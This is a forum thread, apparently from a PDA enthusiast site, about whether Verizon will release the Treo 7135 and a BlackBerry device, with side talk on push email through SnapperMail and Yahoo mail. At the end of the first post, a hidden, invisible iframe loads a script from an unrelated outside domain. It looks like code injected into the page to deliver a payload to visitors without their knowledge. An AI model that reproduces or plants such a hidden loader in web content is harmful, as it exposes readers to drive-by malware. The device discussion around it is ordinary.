+ Reply to Thread

blackberry device for Verizon

I was cruising for help for a user (I do desktop support) and came across this:
    http://www.blackberry.com/products/b...50/index.shtml

Now not that many of us would switch, cause most f not all of us are dedicated Palm users (other than those who have switched to the dark side). I know a few users here who are on the border and have Verizon cell service, a palm for there todo, memos, address, and calendar. But have the Rim for email connectivity. I think that some of these people would wind up switching if the 7135 does not come out for Verizon soon. Many of these people are holding on to their palms, but once they see that the push to combine is to great over to something non palm, then they will switch.

These people are day traders and hate carrying around big items, usually they have the cell and palm in there bag and the rim on them.

Could it be that Verizon is holding off the 7135 till the Rim is also ready to co introduce two solutions for business people, and were are getting stuck waiting?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

This is old news. Posted on here weeks ago.

you are right, I forgot about that thread, though what do you think about my idea of them co releasing the 7135 and the blackberry 6750 simultaniously?

Originally posted by tmonkey
    you are right, I forgot about that thread, though what do you think about my idea of them co releasing the 7135 and the blackberry 6750 simultaniously?
    I guess it's possible, but not likely. They are directed at two different groups of people. The 7135 is phone-centric, while the Blackberry is email first, phone second. Personally, I wish I could have a 7135 with Blackberry "push" email. Oh well, maybe on the 8235! :nuts

Tungsten W

With that Blackberry device, you are sacrificing color, though. If I was to switch, I would go for this:

http://www.palm.com/products/handhel...n-w/specs.html

But, like everyone says, the 7135 has the "form factor"... although this one looks easier for email. Either way, I'm waiting... and waiting...

Maritza

this one is deffenetly sweet, though the fact that it does not have built in speaker and mic is a HUGE downfall. the initlal blackberry phones (thorugh AT&T) were like this and from what i understand only moderatly popular. Also if you remember Motorola had a Verizon phone that was like a pager (also needed a headset to talk), i did not see many of those and i dont think there in the stores anymore

Originally posted by davemayo
    Personally, I wish I could have a 7135 with Blackberry "push" email. Oh well, maybe on the 8235! :nuts
    dave, SnapperMail makes this pretty much possible.
    ~'kito
    pdaPhoneHome Moderator

Is there a subscription fee? Does it work with Lotus Notes?

No subscription fee, but a hefty purchase price. Check it out at www.SnapperMail.com
    ~'kito
    pdaPhoneHome Moderator

Thanks. I'll check it out.

Or yahoo mail which my DSL provider (SBC) has basically forced upon it's users. I'm slowly warming up to it. Can check it via pop, via web, get sms notification to mobile device. Best thing I like is spamguard, available via the web interface. Spam goes in the "bulk mail" folder so I don't have to see it if I don't want to, but sending mail is still better via pop which has access to the email addresses in the address book.
    David